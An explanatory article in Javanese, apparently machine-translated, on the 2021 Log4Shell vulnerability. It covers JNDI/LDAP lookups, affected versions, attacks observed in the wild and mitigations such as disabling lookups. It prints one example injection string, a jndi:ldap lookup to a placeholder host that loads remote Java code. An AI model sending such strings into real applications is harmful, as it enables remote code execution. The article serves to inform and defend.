Bab lan Paragraf[Singidaken][Tampilake]
Ing pungkasan November 2021, kita nemokake ancaman utama kanggo keamanan siber. Eksploitasi iki bisa nyebabake jutaan sistem komputer ing saindenging jagad.
Iki minangka pandhuan babagan kerentanan Log4j lan kepiye cacat desain sing diabaikan nyebabake luwih saka 90% layanan komputer ing donya mbukak kanggo nyerang.
Apache Log4j minangka utilitas logging berbasis Java open-source sing dikembangake dening Apache Software Foundation. Originally ditulis dening Ceki Gülcü ing 2001, saiki dadi bagéan saka Apache Logging Services, sawijining proyek saka Apache Software Foundation.
Perusahaan ing saindenging jagad nggunakake perpustakaan Log4j supaya bisa mlebu log ing aplikasi kasebut. Nyatane, perpustakaan Java pancen ana ing endi wae, sampeyan bisa nemokake ing aplikasi saka Amazon, Microsoft, Google, lan liya-liyane.
Pentinge perpustakaan kasebut tegese manawa ana cacat potensial ing kode kasebut bisa nyebabake mayuta-yuta komputer mbukak kanggo peretasan. Tanggal 24 November 2021, a keamanan maya peneliti makarya kanggo Alibaba nemokake cacat elek.
Kerentanan Log4j, uga dikenal minangka Log4Shell, ora diweruhi wiwit taun 2013. Kerentanan kasebut ngidini aktor jahat mbukak kode ing sistem sing kena pengaruh sing mbukak Log4j. Iki diumumake sacara umum tanggal 9 Desember 2021
Pakar industri nyebutake cacat Log4Shell kerentanan paling gedhe ing memori anyar.
Ing minggu sawise publikasi kerentanan, tim cybersecurity ndeteksi mayuta-yuta serangan. Sawetara peneliti malah ngamati tingkat luwih saka satus serangan saben menit.
Carane ora iku bisa?
Kanggo ngerti sebabe Log4Shell mbebayani banget, kita kudu ngerti apa sing bisa ditindakake.
Kerentanan Log4Shell ngidini eksekusi kode sewenang-wenang, sing tegese panyerang bisa nindakake perintah utawa kode apa wae ing mesin target.
Kepiye carane ngrampungake iki?
Kaping pisanan, kita kudu ngerti apa JNDI.
Java Naming and Directory Interface (JNDI) minangka layanan Java sing ngidini program Java nemokake lan nggoleki data lan sumber daya liwat jeneng. Layanan direktori iki penting amarga nyedhiyakake rekaman sing diatur supaya pangembang bisa gampang ngrujuk nalika nggawe aplikasi.
JNDI bisa nggunakake macem-macem protokol kanggo ngakses direktori tartamtu. Salah siji saka protokol iki yaiku Lightweight Directory Access Protocol, utawa LDAP.
Nalika logging string, log4j nindakake substitusi senar nalika nemoni ekspresi saka formulir kasebut ${prefix:name}
.
Tuladhane, Text: ${java:version}
bisa uga dicathet minangka Teks: Java versi 1.8.0_65. Jenis substitusi iki umum.
Kita uga bisa duwe ekspresi kayata Text: ${jndi:ldap://example.com/file}
sing nggunakake sistem JNDI kanggo mbukak obyek Jawa saka URL liwat protokol LDAP.
Iki kanthi efektif ngemot data sing teka saka URL kasebut menyang mesin. Sembarang peretas potensial bisa dadi host kode jahat ing URL umum lan ngenteni mesin sing nggunakake Log4j kanggo mlebu.
Amarga isi pesen log ngemot data sing dikontrol pangguna, peretas bisa nglebokake referensi JNDI dhewe sing ngarah menyang server LDAP sing dikontrol. Server LDAP iki bisa kebak obyek Java sing mbebayani sing bisa ditindakake JNDI liwat kerentanan kasebut.
Sing nggawe iki luwih elek yaiku ora masalah yen aplikasi kasebut minangka aplikasi sisih server utawa aplikasi sisih klien.
Anggere ana cara kanggo logger maca kode jahat penyerang, aplikasi isih mbukak kanggo eksploitasi.
Sapa sing kena pengaruh?
Kerentanan mengaruhi kabeh sistem lan layanan sing nggunakake APache Log4j, karo versi 2.0 nganti lan kalebu 2.14.1.
Sawetara pakar keamanan menehi saran manawa kerentanan kasebut bisa nyebabake sawetara aplikasi nggunakake Java.
Cacat kasebut pisanan ditemokake ing game video Minecraft sing diduweni Microsoft. Microsoft ngajak pangguna supaya nganyarke piranti lunak Minecraft edisi Java kanggo nyegah risiko.
Jen Easterly, Direktur Cybersecurity and Infrastructure Security Agency (CISA) ujar manawa vendor duwe tanggung jawab utama kanggo nyegah pangguna pungkasan saka aktor jahat sing ngeksploitasi kerentanan iki.
"Vendor uga kudu komunikasi karo para pelanggan kanggo mesthekake pangguna pungkasan ngerti manawa produke ngemot kerentanan iki lan kudu menehi prioritas nganyari piranti lunak."
Serangan kasebut dilaporake wis diwiwiti. Symantec, perusahaan sing nyedhiyakake piranti lunak cybersecurity, wis ngalami macem-macem panjaluk serangan.
Ing ngisor iki sawetara conto jinis serangan sing dideteksi peneliti:
- botnets
Botnet minangka jaringan komputer sing ana ing kontrol pihak sing nyerang. Dheweke mbantu nindakake serangan DDoS, nyolong data, lan penipuan liyane. Peneliti mirsani botnet Muhstik ing skrip cangkang sing diundhuh saka eksploitasi Log4j.
- XMRig Miner Trojan
XMRig minangka penambang cryptocurrency open-source sing nggunakake CPU kanggo nambang token Monero. Penjahat siber bisa nginstal XMRig ing piranti wong supaya bisa nggunakake daya pangolahan tanpa ngerti.
- Khonsari Ransomware
Ransomware nuduhake wangun malware sing dirancang kanggo encrypt file ing komputer. Penyerang banjur bisa nuntut pembayaran minangka ijol-ijolan kanggo menehi akses bali menyang file sing dienkripsi. Peneliti nemokake ransomware Khonsari ing serangan Log4Shell. Dheweke target server Windows lan nggunakake kerangka .NET.
Apa sing kelakon sabanjure?
Para ahli prédhiksi butuh sawetara wulan utawa bisa uga pirang-pirang taun kanggo ngrampungake kekacauan sing disebabake kerentanan Log4J.
Proses iki kalebu nganyari saben sistem sing kena pengaruh karo versi patched. Sanajan kabeh sistem kasebut ditambal, isih ana ancaman kemungkinan backdoors sing bisa uga wis ditambahake dening peretas ing jendela server mbukak kanggo nyerang.
Akeh solusi lan mitigasi ana kanggo nyegah aplikasi supaya ora dieksploitasi dening bug iki. Log4j anyar versi 2.15.0-rc1 ngganti macem-macem setelan kanggo ngurangi kerentanan iki.
Kabeh fitur sing nggunakake JNDI bakal dipateni kanthi gawan lan telusuran remot uga diwatesi. Mateni fitur goleki ing persiyapan Log4j bakal mbantu nyuda risiko eksploitasi.
Ing njaba Log4j, isih perlu rencana sing luwih jembar kanggo nyegah eksploitasi sumber terbuka.
Sadurungé ing Mei, Gedhung Putih dirilis a eksekutif sing tujuane kanggo nambah keamanan siber nasional. Iki kalebu pranata kanggo tagihan bahan piranti lunak (SBOM) sing sejatine minangka dokumen resmi sing ngemot dhaptar saben item sing dibutuhake kanggo nggawe aplikasi kasebut.
Iki kalebu bagean kayata mbukak sumber paket, dependensi, lan API sing digunakake kanggo pangembangan. Sanajan ide SBOM migunani kanggo transparansi, apa bakal mbantu konsumen?
Nganyarke dependensi bisa uga dadi repot. Perusahaan mung bisa milih mbayar denda apa wae tinimbang mbuwang wektu ekstra golek paket alternatif. Mbok SBOMs iki mung bakal migunani yen lingkup diwatesi luwih.
kesimpulan
Masalah Log4j luwih saka mung masalah teknis kanggo organisasi.
Pimpinan bisnis kudu ngerti risiko potensial sing bisa kedadeyan nalika server, produk, utawa layanan ngandelake kode sing ora dijaga dhewe.
Ngandelake aplikasi open-source lan pihak katelu mesthi ana risiko. Perusahaan kudu mikir babagan strategi mitigasi risiko sadurunge ancaman anyar katon.
Umume web gumantung marang piranti lunak open-source sing dikelola dening ewonan sukarelawan ing saindenging jagad.
Yen kita pengin njaga web dadi papan sing aman, pamrentah lan perusahaan kudu nandur modal kanggo mbiayai upaya sumber terbuka lan agensi keamanan siber kayata CISA.
Ninggalake a Reply